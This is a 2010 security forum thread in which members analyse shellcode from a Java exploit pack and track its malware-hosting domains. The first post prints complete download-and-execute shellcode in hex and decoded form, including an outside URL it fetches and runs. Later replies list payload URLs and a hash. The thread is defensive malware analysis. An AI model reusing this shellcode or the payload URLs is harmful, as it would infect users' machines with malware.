Author Topic: Shellcode analysis?  (Read 4592 times)

0 Members and 1 Guest are viewing this topic.

February 13, 2010, 06:15:06 am
Read 4592 times

Garlando

  • Full Member

  • Offline
  • ***

  • 40
hi
i was investigating a java exploit, and decided to take a look at the shellcode

Code: [Select]
505351525657559CE8000000005D83ED0D31C064034030780C8B400C8B701CAD8B4008EB098B40348D407C8B403C5657BE5E01000001EEBF4E01000001EFE8D60100005F5E89EA81C25E010000526880000000FF954E01000089EA81C25E01000031F601C28A9C356302000080FB007406881C3246EBEEC604320089EA81C24502000052FF955201000089EA81C2500200005250FF95560100006A006A0089EA81C25E0100005289EA81C278020000526A00FFD06A0589EA81C25E01000052FF955A01000089EA81C25E010000526880000000FF954E01000089EA81C25E01000031F601C28A9C356E02000080FB007406881C3246EBEEC604320089EA81C24502000052FF955201000089EA81C2500200005250FF95560100006A006A0089EA81C25E0100005289EA81C2A6020000526A00FFD06A0589EA81C25E01000052FF955A0100009D5D5F5E5A595B58C30000000000000000000000000000000047657454656D705061746841004C6F61644C696272617279410047657450726F63416464726573730057696E4578656300BB89F289F730C0AE75FD29F789F931C0BE3C00000003B51B02000066AD03851B0200008B707883C61C03B51B0200008DBD1F020000AD03851B020000ABAD03851B02000050ABAD03851B020000AB5E31DBAD5603851B02000089C689D751FCF3A65974045E43EBE95E93D1E003852702000031F69666ADC1E00203851F02000089C6AD03851B020000C3EB100000000000000000000000000000000089851B0200005657E858FFFFFF5F5EAB01CE803EBB7402EBEDC355524C4D4F4E2E444C4C0055524C446F776E6C6F6164546F46696C6541007064667570642E6578650063726173682E70687000687474703A2F2F3139322E616E74697672323030392E636E2F73656E632E657865009026
Code: [Select]
PSQRVWU�����]�
1d@0x �@ �p�@ �@4�@|�@<VW^��N����_^��^��Rh�����N����^��1��5c����t�2F2���E��R�R����P��RP�V��j�j���^��R��x��Rj�j��^��R�Z����^��Rh�����N����^��1��5n����t�2F2���E��R�R����P��RP�V��j�j���^��R��¦��Rj�j��^��R�Z���]_^ZY[X����������������GetTempPathA�LoadLibraryA�GetProcAddress�WinExec���0u)�1<�����f����px������������P���^1ۭV�����QYt^C^��'��1�f����ƭ�����������������������VWX_^�>tURLMON.DLL�URLDownloadToFileA�pdfupd.exe�crash.php�http://192.antivr2009.cn/senc.exe��&
it uses URLDownloadToFileA to download the malware as pdfupd.exe from hxxp://192.antivr2009.cn/senc.exe
but what left me wondering is the string 'crash.php' can anyone explain to me the purpose of this string, i'm not very talented in analysing malware so if anyone can clarify this to me i'd be very happy

thanks Garland

February 14, 2010, 09:37:00 pm
Reply #1

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
What's the URL that houses this?
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

February 15, 2010, 12:17:11 pm
Reply #2

Garlando

  • Full Member

  • Offline
  • ***

  • 40
What's the URL that houses this?

it's down now, but this site offers the same exploit pack

Code: [Select]
miamiheraldsi.com/in0/index.php
its in the params of the java exploit

February 15, 2010, 01:24:44 pm
Reply #3

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Ah, came across that one earlier ... some lovely code it's got. The shellcode is an exploit (not identified what crash.php is for yet), and the payloads are;

Code: [Select]
http://miamiheraldsi.com/in0/l.php?i=7
http://miamiheraldsi.com/in0/l.php?i=14

Doesn't seem to matter what you put for the i= param, still gives the same content length (131K, MD5: 73B4B7CBE2E65B5385DB30F070534F21).
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

February 15, 2010, 01:29:07 pm
Reply #4

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Ah, came across that one earlier ... some lovely code it's got. The shellcode is an exploit (not identified what crash.php is for yet), and the payloads are;

Code: [Select]
http://miamiheraldsi.com/in0/l.php?i=7
http://miamiheraldsi.com/in0/l.php?i=14

Doesn't seem to matter what you put for the i= param, still gives the same content length (131K, MD5: 73B4B7CBE2E65B5385DB30F070534F21).

Added this morning.

http://www.malwaredomainlist.com/mdl.php?search=miamiheraldsi.com&colsearch=All&quantity=50
Ruining the bad guy's day

February 15, 2010, 01:39:29 pm
Reply #5

Garlando

  • Full Member

  • Offline
  • ***

  • 40
Ah, came across that one earlier ... some lovely code it's got. The shellcode is an exploit (not identified what crash.php is for yet), and the payloads are;

Code: [Select]
http://miamiheraldsi.com/in0/l.php?i=7
http://miamiheraldsi.com/in0/l.php?i=14

Doesn't seem to matter what you put for the i= param, still gives the same content length (131K, MD5: 73B4B7CBE2E65B5385DB30F070534F21).

sorry i mean the param tags in the decoded javascript

<applet src=gsb50.jar ....something other....>
<param name='sc' value='the shellcode'>
</applet>

February 15, 2010, 01:43:02 pm
Reply #6

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
hehe cool :) (related to learn-to-knit.com (site that led me to it)). I've just added the payload URL's to MDL :) (just got back home so finally able to analyze it)

@Garlando,
There's actually two. The first (and commented out for some reason (likely because of the second one), points to l.php?i=10, the second points to i=9. Again however, I can't find any reference or active URL for pdfupd.exe (not ran it on the test machine yet, but guessing pdfupd.exe is the filename it's downloaded as) nor crash.php.
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net